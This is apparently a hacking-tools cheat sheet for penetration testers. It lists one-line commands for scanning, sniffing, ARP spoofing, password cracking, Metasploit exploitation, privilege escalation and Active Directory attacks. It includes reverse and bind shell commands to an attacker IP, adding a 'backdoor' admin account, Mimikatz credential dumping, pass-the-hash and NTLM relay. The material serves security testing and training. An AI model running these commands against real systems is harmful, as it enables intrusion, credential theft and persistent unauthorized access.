Hacking Tools Cheat Sheet

Basic Linux Networking Tools
Show IP configuration:
# ip a lw
Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up
Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0
DNS lookup:
# dig compass-security.com
Reverse DNS lookup:
# dig -x 10.5.23.42

Information Gathering
Find owner/contact of domain or IP address:
# whois compass-security.com
Get nameservers and test for DNS zone transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com
Get hostnames from CT logs:
Search for %.compass-security.com on https://crt.sh.
Or using an nmap script:
# nmap -sn -Pn compass-security.com --script hostmap-crtsh
Combine various sources for subdomain enum:
# amass enum -src -brute -min-for-recursive 2 -d compass-security.com

TCP Tools
Listen on TCP port:
# ncat -l -p 1337
Connect to TCP port:
# ncat 10.5.23.42 1337

TLS Tools
Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/"
Start TLS Server:
# ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pem
Connect to TLS service:
# ncat --ssl 10.5.23.42 1337
Connect to TLS service using openssl:
# openssl s_client -connect 10.5.23.42:1337
Show certificate details:
# openssl s_client -connect 10.5.23.42:1337 | openssl x509 -text
Test TLS server certificate and ciphers:
# sslyze --regular 10.5.23.42:443
TCP to TLS proxy:
# socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443
Online TLS tests:
• ssllabs.com, hardenize.com

HTTP Tools
Start Python webserver on port 2305:
# python3 -m http.server 2305
Perform HTTP Request:
# curl http://10.5.23.42:2305/?foo=bar
Useful curl options:
• -k: Accept untrusted certificates
• -d "foo=bar": HTTP POST data
• -H "Foo: Bar": HTTP header
• -I: Perform HEAD request
• -L: Follow redirects
• -o foobar.html: Write output file
• --proxy http://127.0.0.1:8080: Set proxy
Scan for common files/applications/configs:
# nikto -host https://example.net
Enumerate common directory-/filenames:
# gobuster dir -k -u https://example.net -w /usr/share/wordlists/dirb/common.txt

Sniffing
Sniff traffic:
# tcpdump [options] [filters]
Useful tcpdump options:
• -i interface: Interface or any for all
• -n: Disable name and port resolution
• -A: Print in ASCII
• -XX: Print in hex and ASCII
• -w file: Write output PCAP file
• -r file: Read PCAP file
Useful tcpdump filters:
• not arp: No ARP packets
• port ftp or port 23: Only port 21 or 23
• host 10.5.23.31: Only from/to host
• net 10.5.23.0/24: Only from/to hosts in network
Advanced sniffing using tshark or Wireshark.
Sniffing over SSH on a remote host:
# ssh 10.5.23.42 tcpdump -w- port not ssh | wireshark -k -i -
Search in network traffic:
# ngrep -i password
Show HTTP GET requests:
# urlsnarf
Show transmitted images:
# driftnet
ARP spoofing:
# arpspoof -t 10.5.23.42 10.5.23.1
Or a graphical tool:
# ettercap -G
Show ARP cache:
# ip neigh
Delete ARP cache:
# ip neigh flush all

Network Scanning
ARP Scan:
# nmap -n -sn -PR 10.5.23.0/24
Reverse DNS lookup of IP range:
# nmap -sL 10.5.23.0/24
Nmap host discovery (ARP, ICMP, SYN 443/tcp, ACK 80/tcp):
# nmap -sn -n 10.5.23.0/24
TCP scan (SYN scan = half-open scan):
# nmap -Pn -n -sS -p 22,25,80,443,8080 10.5.23.0/24
List Nmap scripts:
# ls /usr/share/nmap/scripts
Scan for EternalBlue vulnerable hosts:
# nmap -n -Pn -p 443 --script smb-vuln-ms17-010 10.5.23.0/24
Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script "vuln and safe" 10.5.23.0/24
Performance Tuning (1 SYN packet ≈ 60 bytes → 20'000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000 10.5.23.0/24
Useful nmap options:
• -n: Disable name and port resolution
• -PR: ARP host discovery
• -Pn: Disable host discovery
• -sn: Disable port scan (host discovery only)
• -sS/-sT/-sU: SYN/TCP connect/UDP scan
• --top-ports 50: Scan 50 top ports
• -iL file: Host input file
• -oA file: Write output files (3 types)
• -sC: Script scan (default scripts)
• --script <file/category>: Specific scripts
• -sV: Version detection
• -6: IPv6 scan
The target can be specified using CIDR notation (10.5.23.0/24) or range definitions (10.13-37.5.1-23).
Fast scan using masscan:
# masscan -p80,8000-8100 --rate 20000 10.0.0.0/8
Public internet scan databases:
• shodan.io, censys.io

Shells
Start bind shell (on victim):
# ncat -l -p 2305 -e "/bin/bash -i"
Connect to bind shell (on attacker):
# ncat 10.5.23.42 2305
Listen for reverse shell (on attacker):
# ncat -l -p 23
Start reverse shell (on victim):
# ncat -e "/bin/bash -i" 10.5.23.5 23
Start reverse shell with bash only (on victim):
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1
Upgrade to pseudo terminal:
# python -c 'import pty; pty.spawn("/bin/bash")'

Vulnerability DBs and Exploits
Exploit search (local copy of the Exploit-DB):
# searchsploit apache
Show exploit file path and copy it into clipboard:
# searchsploit -p 40142
Online vulnerability and exploit databases:
• cvedetails.com, exploit-db.com, packetstormsecurity.com

Cracking
Try SSH passwords from a wordlist:
# ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24
Determine hash type:
# hashid 869d[...]bd88
Show example hash types for hashcat:
# hashcat --example-hashes
Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*
Crack hashes using John the Ripper:
# john hashes.txt

Metasploit Framework
Start Metasploit:
# msfconsole
Search exploit:
> search eternalblue
Use exploit:
msf > use exploit/windows/smb/ms17_…
Configure exploit:
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42
Run exploit:
msf exploit(…) > exploit
Generate reverse shell (WAR):
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip address> LPORT=443 -f war > sh.war
Reverse shell listener:
> use exploit/multi/handler
> set payload linux/x64/shell_reverse_tcp
> set LHOST 10.5.23.42 # attacker
> set LPORT 443
> exploit
Upgrade to Meterpreter (or press ^Z (Ctrl-Z)):
background
Background session 1? [y/N] y
> sessions # list sessions
> sessions -u 1 # Upgrade
> sessions 2 # interact with session 2
meterpreter > sysinfo # use it
Upload / download files:
meterpreter > upload pwn.exe
meterpreter > download c:\keepass.kdb
Execute a file:
meterpreter > execute -i -f /your/bin
Port forwarding to localhost:
meterpreter > portfwd add -l 2323 -p 3389 -r 10.5.23.23
Background Meterpreter session:
meterpreter > background
Pivoting through existing Meterpreter session:
> use post/multi/manage/autoroute
> set session 2 # meterpreter session
> run
> route
SOCKS via Meterpreter (requires autoroute):
> use auxiliary/server/socks4a
> set SRVPORT 8080
> run
Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080
Connect through SOCKS proxy:
# proxychains ncat 172.23.5.42 1337

Linux Privilege Escalation
Enumerate local information (-t for more tests):
# curl -o /tmp/linenum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# bash /tmp/linenum -r /tmp/report
Other hardening checks can be done using lynis or LinPEAS.
Use sudo/SUID/capabilities/etc. exploits from gtfobins.github.io.

Windows Privilege Escalation
Copy PowerUp.ps1 from GitHub "PowerShellMafia/PowerSploit" into PowerShell to bypass ExecutionPolicy and execute Invoke-AllChecks. Use the abuse functions.
Add a new local admin:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators backdoor /add
Scan for network shares:
# smbmap.py --host-file smbhosts.txt -u Administrator -p PasswordOrHash

Windows Credentials Gathering
Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv
Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv /sam:sam.hiv

Pass-the-Hash
Shell via pass-the-hash (Impacket Tools):
# ./psexec.py -hashes :011AD41795657A8ED80AB3FF6F078D03 domain/username@10.5.23.42
Over a subnet and extract SAM file:
# crackmapexec -u Administrator -H :011AD41795657A8ED80AB3FF6F078D03 10.5.23.0/24 --sam
Browse shares via pass-the-hash:
# ./smbclient.py domain/username@10.5.23.42 -hashes :011AD41795657A8ED80AB3FF6F078D03
RDP via pass-the-hash:
# xfreerdp /u:user /d:domain /pth:011AD41795657A8ED80AB3FF6F078D03 /v:10.5.23.42
Meterpreter via pass-the-hash:
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > set RHOST 10.5.23.21 # victim
msf > set SMBPass 01[...]03:01[...]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>

NTLM Relay
Vulnerable if message_signing: disabled:
# nmap -n -Pn -p 445 --script smb-security-mode 10.5.23.0/24
Disable SMB and HTTP in Responder.conf and start Responder:
# ./Responder.py -I eth0
NTLM Relay to target and extract SAM file:
# ./ntlmrelayx.py -smb2support -t smb://10.5.23.42
NTLM Relay using socks proxy:
# ./ntlmrelayx.py -tf targets.txt -smb2support -socks
Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080
Access files via SOCKS proxy:
# proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Administrator%invalidPwd

Active Directory
Use SharpHound to gather information and import into Bloodhound to analyze.
Download PingCastle from pingcastle.com and generate Report.

More Online References
• GitHub "swisskyrepo/PayloadsAllTheThings"
• GitHub "danielmiessler/SecLists"
• GitHub "enaqx/awesome-pentest"

Find more StationX Cheat Sheets here: https://www.stationx.net/category/cheat-sheets/